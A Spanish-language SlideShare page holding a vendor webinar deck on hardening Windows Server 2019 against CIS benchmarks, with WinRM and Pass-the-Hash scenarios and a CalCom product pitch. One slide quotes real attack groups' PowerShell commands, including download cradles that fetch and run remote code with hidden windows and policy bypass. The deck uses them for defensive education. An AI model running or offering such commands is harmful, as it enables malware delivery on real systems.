SlideShare uma empresa Scribd logo

WINDOWS 2019 HARDENING (Aseguramiento)

Cristian Garcia G.
Cristian Garcia G.

Este documento presenta soluciones para el proceso de aseguramiento de servidores Windows 2019. Se discuten los estándares CIS y la importancia del cumplimiento, así como el proceso manual de aseguramiento y sus desafíos. También se introduce la automatización de aseguramiento de Calcom para superar estos desafíos mediante la simulación del impacto de políticas, la aplicación de políticas granulares y el monitoreo continuo del cumplimiento.

Tecnologia
1 de 31
Baixar para ler offline
Windows 2019 Hardening Garantice el cumplimiento de CIS y evite interrupciones en la producción Eduardo Rivero Gerente de Consultoría y Servicios de Seguridad Jerry Ludmir CEO, CalCom Software Dvir Goren CTO, CalCom Software
Eduardo Rivero Gerente de Consultoría y Servicios, Securesoft • Gerente Regional de consultoría y servicios especializados con más de 17 años de experiencia en tecnología y seguridad de la información. • Líder QA de proyectos consultivos de ciberseguridad, y gestión de respuesta ante incidentes. • Experto en estándares y normativas de seguridad a nivel global: ISO 27001/9001, COBIT, SANS, ENISA, PCI, entre otros. • Certificado como CRISC, CBCP, LCSPC, SFPC en el rubro. • En su trayectoria, ha liderado más de 150 proyectos consultivos de ciberseguridad en los últimos 07 años
Jerry Ludmir CEO, CalCom • Veterano de la industria de TI, con mas de 30 años de experiencia en la industria • Emprendedor y fundador de grandes empresas en la industria de TI • Fundó Calcom hace 15 años manteniéndose en su rol de liderazgo Dvir Goren CTO, CalCom • Veterano de la industria de TI con mas de 25 años de experiencia en la industria • Líder de opinión en el campo del aseguramiento de servidores con más de 13 años de gestión de proyectos complejos de fortalecimiento • Consultor de las organizaciones de seguridad nacional en el tema del aseguramiento de servidores • Lidera el equipo de productos de CalCom durante los últimos 15 años, desarrollando la estrategia y roadmap del producto
Introducción • CalCom ofrece soluciones de automatización para el proceso de aseguramiento en equipos de seguridad y TI. • Apoyando grandes organizaciones para lograr el aseguramiento de su infraestructura por mas de 15 años. • Hacemos felices tanto a equipos de seguridad como de TI!
Agenda • Aseguramiento de Servidores – ¿Qué es? ¿Porqué es importante? • Proceso Manual de Aseguramiento • Esquemas de Cumplimiento – Acercándonos al benchmark de CIS • Escenarios de aseguramiento - lab • Introducción al enfoque de automatización de aseguramiento de Calcom
Aseguramiento de Servidores – ¿Qué es? ¿Porqué? • Mejora de la seguridad del servidor a través de una variedad de cambios en la configuración para reducir la superficie de ataque • Cumplimiento/auditoría: PCI, FDIC, ciber regulaciones gubernamentales, NIST 800-53 • Prácticas recomendadas de seguridad: eliminación de vulnerabilidades críticas Servicios Asegurar Ataques SMBv1 Wannacry RDP Bluekeep, Dejablue, Ryuk TLS POODLE NTLM MTLM Relay
Proceso Manual de Aseguramiento Definir la política • Colaboración y aprobación de seguridad, TI, gerencia, auditoría • Granularidad de políticas: por función del servidor, versión del sistema operativo, etc. • Política basada en puntos de referencia conocidos Prueba de Laboratorio • Simular la producción en un entorno de prueba. • Realizar pruebas para evitar interrumpir la producción. Asegurando el Servidor • Asegurar los entornos de prueba y pre-producción antes de pasar a producción • Fortalecimiento del entorno de producción: ¿cómo? (GPO, manualmente, herramientas)
Benchmarks de Cumplimiento - CIS Benchmarks • Documento de casi 1,000 páginas • Más de 400 recomendaciones de aseguramiento
Benchmarks de Cumplimiento - CIS Benchmarks
ESCENARIOS de ASEGURAMIENTO
Escenario #1: Ataque Malicioso via PowerShell remoto PowerShell Como Plataforma de Ataque • Ataques maliciosos con PowerShell crecieron 661% en 2019* • PowerShell está en todos lados: plataformas de sistemas operativos, protocolos, aplicaciones, nube etc. • Interface con .NET y APIs de Windows • CMD.exe está normalmente bloqueado, pero no PowerShell • Ejecuta código en memoria sin tocar el disco • Descarga y ejecuta código desde otro sistema (Remote execution attack) • Una vez el intruso tiene acceso, todas las herramientas estándar del sistema operativo le están disponibles • Ataques mas famosos son Petya y NotPetya *Symantec security Center
Attack groups Script invocations Pupa/ DeepPanda powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c “IEX ((new-object net.webclient). downloadstring([REMOVED]))” Pupa/ DeepPanda powershell.exe -Win hidden -Enc [REMOVED] Pupa/ DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED] SeaDuke powershell -executionpolicy bypass -File diag3.ps1 SeaDuke powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] - Password [REMOVED] -Mailbox CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED] Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED] Buckeye powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile(“””http://[REMOVED]/ images/rec.exe”””,”””$env:tmprec.exe”””);Iex %tmp%rec.exe Ejemplos de script usados en ataques dirigidos • Estos ataques son muy difíciles de detectar por los equipos de ciberseguridad • Se ven como actividad normal de usuarios Escenario #1: Ataque Malicioso via PowerShell remoto
Setting: Name Category Default Value 2016 CIS 2016 CIS Control Level (2016) CIS Control ## (2016) Default Value 2019 CIS MS2019 CIS Control Level (2019) CIS Control # (2019) Allow Basic authentication WinRM Client Disabled L1 18.9.97.1.1 Disabled. (The WinRM client does not use Basic authentication.) Disabled L1 18.9.97.1.1 Allow unencrypted traffic WinRM Client Disabled L1 18.9.97.1.2 Disabled. (The WinRM client sends or receives only encrypted messages over the network.) Disabled L1 18.9.97.1.2 Disallow Digest authentication WinRM Client Enabled L1 18.9.97.1.3 Disabled. (The WinRM client will use Digest authentication.) Enabled L1 18.9.97.1.3 Allow Basic authentication WinRM Service Disabled L1 18.9.97.2.1 Disabled. (The WinRM service will not accept Basic authentication from a remote client.) Disabled L1 18.9.97.2.1 Allow remote server management through WinRM WinRM Service Disabled L2 18.9.97.2.2 Disabled. (The WinRM service will not respond to requests from a remote computer, regardless of whether or not any WinRM listeners are configured.) Disabled L2 18.9.97.2.2 Allow unencrypted traffic WinRM Service Disabled L1 18.9.97.2.3 Disabled. (The WinRM service sends or receives only encrypted messages over the network.) Disabled L1 18.9.97.2.3 Disallow WinRM from storing RunAs credentials WinRM Service Enabled L1 18.9.97.2.4 Disabled. (The WinRM service will allow the RunAsUser and RunAsPassword configuration values to be set for plug-ins and the RunAsPassword value will be stored securely.) Enabled L1 18.9.97.2.4 Allow Remote Shell Access Windows Remote Shell Disabled L2 18.9.98.1 Enabled. (New Remote Shell connections are allowed.) Disabled L2 18.9.98.1 Escenario #1: Ataque Malicioso via PowerShell remoto Recomendaciones de CIS
18.9.97.2.2 (L2) Ensure 'Allow remote server management through WinRM' is set to 'Disabled' (Scored) • GPO: Computer ConfigurationAdministrative TemplatesWindows ComponentsWindows Remote Management (WinRM)WinRM ServiceAllow remote server management through WinRM • Reg: HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWinRMServiceAllowAutoConfig Nota: • Según CIS no hay impacto en el servidor porque es el comportamientos por defecto • Es correcto solo para servidores recién instalados pero no considera las actividades administrativas posteriores en el ambiente Escenario #1: Ataque Malicioso via PowerShell remoto
Ejemplo de Comandos: Escenario #1: Ataque Malicioso via PowerShell remoto
Ejemplos de Comandos: Invoke-Command -ComputerName win2016iis -Credential chslabdave -ScriptBlock { Get-Culture} Escenario #1: Ataque Malicioso via PowerShell remoto
Buscar en el log de eventos – event id 600: Nota: HostApplication=C:Wind owssystem32wsmprov host.exe -Embedding El host de PowerShell wsmprovhost.exe es un proceso proxy ejecutado de forma remota a través de PowerShell cuando se usa la Administración Remota de Windows (WinRM) Escenario #1: Ataque Malicioso via PowerShell remoto
• Pass the Hash es una técnica de ataque que permite a un atacante autenticarse en un servidor o servicio remoto mediante el uso del hash NTLM o LM de la contraseña de un usuario. • Reemplaza la necesidad de robar la contraseña de texto sencillo • Proceso de ataque: • Obtiene el hash del nombre de usuario y su contraseña • Usa el hash (o contraseña) para autenticar el servidor remoto • Usa LM o NTLM • No es necesario aplicar fuerza bruta a los hash para obtener el texto de la contraseña sin cifrar • Debilidad: en el protocolo de autenticación, donde el hash de la contraseña permanece estático de una sesión a otra hasta que la contraseña se cambie . • Se puede realizar contra cualquier servidor o servicio que acepte autenticación LM o NTLM (Windows, Unix o cualquier otro sistema operativo). Escenario #2: Ataque Pass the Hash
2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network authentication' is set to 'Enabled' (Scored) • GPO: Computer ConfigurationPoliciesWindows SettingsSecurity SettingsLocal PoliciesSecurity OptionsNetwork access: Do not allow storage of passwords and credentials for network authentication • Reg: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa:DisableDomainCreds Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network authentication' is set to 'Enabled' (Scored) Escenario #2: Ataque Pass the Hash: Recomendaciones CIS
Automatización es esencial. Veamos como se puede hacer…
CHS – El Proceso de Aseguramiento MODO APRENDIZAJE Simula el impacto de la política en el ambiente de producción MODO APLICACIÓN Aplica las políticas que endurecen cada servidor individualmente MODO MONITOREO Protege y controla el acceso en tiempo real
CHS de Calcom • Automatiza el proceso de prueba de políticas. • Realiza un análisis de impacto de políticas directamente en el ambiente de producción • Aplica una política granular por servidor / versión / rol • Garantiza el cumplimiento continuo
Contacte a CalCom Estamos aquí para ayudarlos con su proyecto de aseguramiento! Contáctenos vía: Email: info@calcomsoftware.com Página web de CalCom: www.calcomsoftware.com
Q&A Use la función de Q&A de Zoom Escribanos también por el chat

Recomendados

Penetration Testing Execution Phases
Penetration Testing Execution Phases Penetration Testing Execution Phases
Penetration Testing Execution Phases Nasir Bhutta
 
Proteccion y seguridad de sistemas operativos
Proteccion y seguridad de sistemas operativosProteccion y seguridad de sistemas operativos
Proteccion y seguridad de sistemas operativosEnrike Mendoza
 
Proyectos de seguridad informática
Proyectos de seguridad informáticaProyectos de seguridad informática
Proyectos de seguridad informáticaRaúl Díaz
 
Charla ciberseguridad
Charla ciberseguridadCharla ciberseguridad
Charla ciberseguridadGilber Corrales Rubiano
 
Network Security Tutorial | Introduction to Network Security | Network Securi...
Network Security Tutorial | Introduction to Network Security | Network Securi...Network Security Tutorial | Introduction to Network Security | Network Securi...
Network Security Tutorial | Introduction to Network Security | Network Securi...Edureka!
 
Modulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaModulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaJuan Manuel García
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Miguel de la Cruz
 
Ingenieria social.pptx
Ingenieria social.pptxIngenieria social.pptx
Ingenieria social.pptxLuis Flores
 

Recomendados

Penetration Testing Execution Phases
Penetration Testing Execution Phases Penetration Testing Execution Phases
Penetration Testing Execution Phases Nasir Bhutta
 
Proteccion y seguridad de sistemas operativos
Proteccion y seguridad de sistemas operativosProteccion y seguridad de sistemas operativos
Proteccion y seguridad de sistemas operativosEnrike Mendoza
 
Proyectos de seguridad informática
Proyectos de seguridad informáticaProyectos de seguridad informática
Proyectos de seguridad informáticaRaúl Díaz
 
Charla ciberseguridad
Charla ciberseguridadCharla ciberseguridad
Charla ciberseguridadGilber Corrales Rubiano
 
Network Security Tutorial | Introduction to Network Security | Network Securi...
Network Security Tutorial | Introduction to Network Security | Network Securi...Network Security Tutorial | Introduction to Network Security | Network Securi...
Network Security Tutorial | Introduction to Network Security | Network Securi...Edureka!
 
Modulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaModulo I: Arquitectura de Seguridad Informática
Modulo I: Arquitectura de Seguridad InformáticaJuan Manuel García
 
Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Vulnerabilidades en sitios web(español)
Vulnerabilidades en sitios web(español)Miguel de la Cruz
 
Ingenieria social.pptx
Ingenieria social.pptxIngenieria social.pptx
Ingenieria social.pptxLuis Flores
 
Seguridad de la informacion
Seguridad de la informacionSeguridad de la informacion
Seguridad de la informacionGiovanita Caira
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redesdpovedaups123
 
Tema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosTema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosFrancisco Medina
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Mohammed Adam
 
Caso práctico implantación iso 27001
Caso práctico implantación iso 27001Caso práctico implantación iso 27001
Caso práctico implantación iso 27001ascêndia reingeniería + consultoría
 
Seguridad de la Informacion
Seguridad de la InformacionSeguridad de la Informacion
Seguridad de la InformacionAngel Ricardo Marchan Collazos
 
Seguridad en la nube exposicion completa
Seguridad en la nube exposicion completaSeguridad en la nube exposicion completa
Seguridad en la nube exposicion completaMaxwell Kenshin
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Firewall
FirewallFirewall
Firewallguajiro27
 
Itsec (information technology security evaluation criteria)
Itsec (information technology security evaluation criteria)Itsec (information technology security evaluation criteria)
Itsec (information technology security evaluation criteria)Alexander Velasque Rimac
 
Zonas dmz y_puertos
Zonas dmz y_puertosZonas dmz y_puertos
Zonas dmz y_puertosKarina Gutiérrez
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redesJaime Abraham Rivera
 
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?Supra Networks
 
INTRODUCCION CIBERSEGURIDAD
INTRODUCCION CIBERSEGURIDADINTRODUCCION CIBERSEGURIDAD
INTRODUCCION CIBERSEGURIDADMiguel Cabrera
 
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTERSEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTERMiguel Cabrera
 
Cloud Computing and Security - ISACA Hyderabad Chapter Presentation
Cloud Computing and Security - ISACA Hyderabad Chapter PresentationCloud Computing and Security - ISACA Hyderabad Chapter Presentation
Cloud Computing and Security - ISACA Hyderabad Chapter PresentationVenkateswar Reddy Melachervu
 
1. Metodologia PPDIOO.pptx
1. Metodologia PPDIOO.pptx1. Metodologia PPDIOO.pptx
1. Metodologia PPDIOO.pptxAndres Rodriguez Lopez
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICAWalter Edison Alanya Flores
 
Ingeniería Social 2014
Ingeniería Social 2014Ingeniería Social 2014
Ingeniería Social 2014Instituto Juan Bosco de Huánuco
 
Información Certificación y Formación CISM 2017 ES
Información Certificación y Formación CISM 2017 ESInformación Certificación y Formación CISM 2017 ES
Información Certificación y Formación CISM 2017 ESISACA Madrid Chapter
 
Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000teddy666
 
Microsoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 IMicrosoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 Iteddy666
 

Mais conteúdo relacionado

Mais procurados

Seguridad de la informacion
Seguridad de la informacionSeguridad de la informacion
Seguridad de la informacionGiovanita Caira
 
Tema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosTema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosFrancisco Medina
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Mohammed Adam
 
Seguridad en la nube exposicion completa
Seguridad en la nube exposicion completaSeguridad en la nube exposicion completa
Seguridad en la nube exposicion completaMaxwell Kenshin
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Itsec (information technology security evaluation criteria)
Itsec (information technology security evaluation criteria)Itsec (information technology security evaluation criteria)
Itsec (information technology security evaluation criteria)Alexander Velasque Rimac
 
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?Supra Networks
 
INTRODUCCION CIBERSEGURIDAD
INTRODUCCION CIBERSEGURIDADINTRODUCCION CIBERSEGURIDAD
INTRODUCCION CIBERSEGURIDADMiguel Cabrera
 
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTERSEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTERMiguel Cabrera
 
Cloud Computing and Security - ISACA Hyderabad Chapter Presentation
Cloud Computing and Security - ISACA Hyderabad Chapter PresentationCloud Computing and Security - ISACA Hyderabad Chapter Presentation
Cloud Computing and Security - ISACA Hyderabad Chapter PresentationVenkateswar Reddy Melachervu
 
Información Certificación y Formación CISM 2017 ES
Información Certificación y Formación CISM 2017 ESInformación Certificación y Formación CISM 2017 ES
Información Certificación y Formación CISM 2017 ESISACA Madrid Chapter
 

Mais procurados (20)

Seguridad de la informacion
Seguridad de la informacionSeguridad de la informacion
Seguridad de la informacion
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Tema 2: Análisis de Riesgos
Tema 2: Análisis de RiesgosTema 2: Análisis de Riesgos
Tema 2: Análisis de Riesgos
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
 
Caso práctico implantación iso 27001
Caso práctico implantación iso 27001Caso práctico implantación iso 27001
Caso práctico implantación iso 27001
 
Seguridad de la Informacion
Seguridad de la InformacionSeguridad de la Informacion
Seguridad de la Informacion
 
Seguridad en la nube exposicion completa
Seguridad en la nube exposicion completaSeguridad en la nube exposicion completa
Seguridad en la nube exposicion completa
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Firewall
FirewallFirewall
Firewall
 
Itsec (information technology security evaluation criteria)
Itsec (information technology security evaluation criteria)Itsec (information technology security evaluation criteria)
Itsec (information technology security evaluation criteria)
 
Zonas dmz y_puertos
Zonas dmz y_puertosZonas dmz y_puertos
Zonas dmz y_puertos
 
Seguridad en redes
Seguridad en redesSeguridad en redes
Seguridad en redes
 
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
Ataques cibernéticos: ¿Qué es el eavesdropping y cómo se previene?
 
INTRODUCCION CIBERSEGURIDAD
INTRODUCCION CIBERSEGURIDADINTRODUCCION CIBERSEGURIDAD
INTRODUCCION CIBERSEGURIDAD
 
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTERSEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
SEGURIDAD Y ADMINISTRACIÓN DE DATA CENTER
 
Cloud Computing and Security - ISACA Hyderabad Chapter Presentation
Cloud Computing and Security - ISACA Hyderabad Chapter PresentationCloud Computing and Security - ISACA Hyderabad Chapter Presentation
Cloud Computing and Security - ISACA Hyderabad Chapter Presentation
 
1. Metodologia PPDIOO.pptx
1. Metodologia PPDIOO.pptx1. Metodologia PPDIOO.pptx
1. Metodologia PPDIOO.pptx
 
SEGURIDAD INFORMATICA
SEGURIDAD INFORMATICASEGURIDAD INFORMATICA
SEGURIDAD INFORMATICA
 
Ingeniería Social 2014
Ingeniería Social 2014Ingeniería Social 2014
Ingeniería Social 2014
 
Información Certificación y Formación CISM 2017 ES
Información Certificación y Formación CISM 2017 ESInformación Certificación y Formación CISM 2017 ES
Información Certificación y Formación CISM 2017 ES
 

Semelhante a WINDOWS 2019 HARDENING (Aseguramiento)

Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000teddy666
 
Microsoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 IMicrosoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 Iteddy666
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores DedicadosNominalia
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de redCarlitos Alvarado
 
Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)Omega Peripherals
 
Ccna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesCcna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesJavier H
 
Seguridad en sistemas distribuidos
Seguridad en sistemas distribuidosSeguridad en sistemas distribuidos
Seguridad en sistemas distribuidosTensor
 
Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6pacvslideshare
 
Ssh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backupSsh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backupmatateshion
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Windows Server Tech Day Longhorn
Windows Server Tech Day LonghornWindows Server Tech Day Longhorn
Windows Server Tech Day LonghornDOMINICUS
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Implementing network security_es
Implementing network security_esImplementing network security_es
Implementing network security_esJazminmrodenas
 
Portafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptxPortafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptxGrupoInnsumoda
 

Semelhante a WINDOWS 2019 HARDENING (Aseguramiento) (20)

Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000
 
Microsoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 IMicrosoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 I
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores Dedicados
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de red
 
Hardening windows
Hardening windowsHardening windows
Hardening windows
 
Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)
 
Ccna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesCcna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devices
 
Seguridad en sistemas distribuidos
Seguridad en sistemas distribuidosSeguridad en sistemas distribuidos
Seguridad en sistemas distribuidos
 
Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6
 
Seguridad
SeguridadSeguridad
Seguridad
 
Ssh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backupSsh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backup
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Windows Server Tech Day Longhorn
Windows Server Tech Day LonghornWindows Server Tech Day Longhorn
Windows Server Tech Day Longhorn
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Implementing network security_es
Implementing network security_esImplementing network security_es
Implementing network security_es
 
Portafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptxPortafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptx
 

Mais de Cristian Garcia G.

Making App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously EasyMaking App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously EasyCristian Garcia G.
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCristian Garcia G.
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadCristian Garcia G.
 
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio. Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio. Cristian Garcia G.
 
Ciberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IACiberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IACristian Garcia G.
 
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)Cristian Garcia G.
 
Protección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-DatacenterProtección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-DatacenterCristian Garcia G.
 
La Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo TecnológicoLa Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo TecnológicoCristian Garcia G.
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Cristian Garcia G.
 
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...Cristian Garcia G.
 
Un enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbridoUn enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbridoCristian Garcia G.
 
La crisis de identidad que se avecina
La crisis de identidad que se avecinaLa crisis de identidad que se avecina
La crisis de identidad que se avecinaCristian Garcia G.
 
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxitoSimplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxitoCristian Garcia G.
 
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...Cristian Garcia G.
 
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCStay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCCristian Garcia G.
 
La evolución de IBM Qradar Suite
La evolución de IBM Qradar SuiteLa evolución de IBM Qradar Suite
La evolución de IBM Qradar SuiteCristian Garcia G.
 
Ciberseguridad en GTD, SecureSoft en GTD
